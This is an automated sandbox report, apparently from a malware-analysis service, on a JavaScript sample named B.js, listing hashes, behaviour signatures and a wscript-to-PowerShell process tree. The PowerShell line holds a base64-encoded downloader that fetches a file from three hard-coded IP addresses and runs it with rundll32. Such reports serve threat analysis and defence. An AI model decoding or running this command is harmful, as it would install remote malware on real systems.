Analysis
-
max time kernel
30s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
04/05/2023, 10:34
Static task
static1
Behavioral task
behavioral1
Sample
B.js
Resource
win7-20230220-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
B.js
Resource
win10v2004-20230220-en
6 signatures
150 seconds
General
-
Target
B.js
-
Size
57KB
-
MD5
52d96ebabe2bc08cb504f4b7b29b5f65
-
SHA1
a609c8c0fbd4867421d65fa79834c3527cbb7690
-
SHA256
ef023b0a3aa55f424298cb1f64a496392c61c02b8167b04feedc7cc31d123f2b
-
SHA512
046cbcc8c80e2688432eaf1cf957388818f828642b6328fea5553adac4a25813ec875678c5c501577dc7c7288c9adbffd71195995aab18d51a76e9cff7b30c30
-
SSDEEP
768:VyMNhRhlTosj7PJMenmwELqOttPki0P9B9VosNMaEiGHGr6kQ7Ig1KzHyyLdSmKl:fUsZnwGGkQ7A0xherXT4EANnOvwr
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1628 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1628 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1964 wrote to memory of 896 1964 wscript.exe 28 PID 1964 wrote to memory of 896 1964 wscript.exe 28 PID 1964 wrote to memory of 896 1964 wscript.exe 28 PID 896 wrote to memory of 1628 896 wscript.exe 29 PID 896 wrote to memory of 1628 896 wscript.exe 29 PID 896 wrote to memory of 1628 896 wscript.exe 29
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\B.js1⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\B.js" UnpiquedUnpreventative WiregrassUncrisp inthralls indiscussible2⤵
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JAB1AG4AZABlAHIAcABpAHQAYwBoAEUAeABoAGkAYgBpAHQAaQBvAG4AaQB6AGUAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADQALgAyADMANAAuADEAMQA5AC4ANwA5AC8AVQBYAFkALwBxAHQAUgBHAGgAaQBVAHAANgBlADYALABoAHQAdABwADoALwAvADEAMAA0AC4AMgAzADQALgAxADEAOAAuADEANQAzAC8AZQBoAHQAdABSADMALwBBAFcAawA0AHYASAAsAGgAdAB0AHAAOgAvAC8AMQA3ADIALgA4ADYALgAxADIAMwAuADEAMAAzAC8ANQBNAEcAeQBWAC8ANwB1ADcAZQBrADYARgA2ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAGMAaABvAGsAZQBiAGUAcgByAHkAUQB1AGUAYQBjAGgAaQBlAHIAIABpAG4AIAAkAHUAbgBkAGUAcgBwAGkAdABjAGgARQB4AGgAaQBiAGkAdABpAG8AbgBpAHoAZQApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAYwBoAG8AawBlAGIAZQByAHIAeQBRAHUAZQBhAGMAaABpAGUAcgAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEANgAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAQgBpAHMAYQBnAHIAZQAuAGQAaQBzAHAAbABhAGMAZQByAFAAaAB5AGwAbABvAHAAbwBkAG8AdQBzADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAQgBpAHMAYQBnAHIAZQAuAGQAaQBzAHAAbABhAGMAZQByAFAAaAB5AGwAbABvAHAAbwBkAG8AdQBzACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANQAwADAAMAAwACkAIAB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAUQBBAFIAUQBCAE4AQQBGAEEAQQBYAEEAQgBDAEEARwBrAEEAYwB3AEIAaABBAEcAYwBBAGMAZwBCAGwAQQBDADQAQQBaAEEAQgBwAEEASABNAEEAYwBBAEIAcwBBAEcARQBBAFkAdwBCAGwAQQBIAEkAQQBVAEEAQgBvAEEASABrAEEAYgBBAEIAcwBBAEcAOABBAGMAQQBCAHYAQQBHAFEAQQBiAHcAQgAxAEEASABNAEEATABBAEIAVQBBAEcAawBBAGIAUQBCAGwAQQBEAHMAQQAiADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7AH0AfQA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628
-
-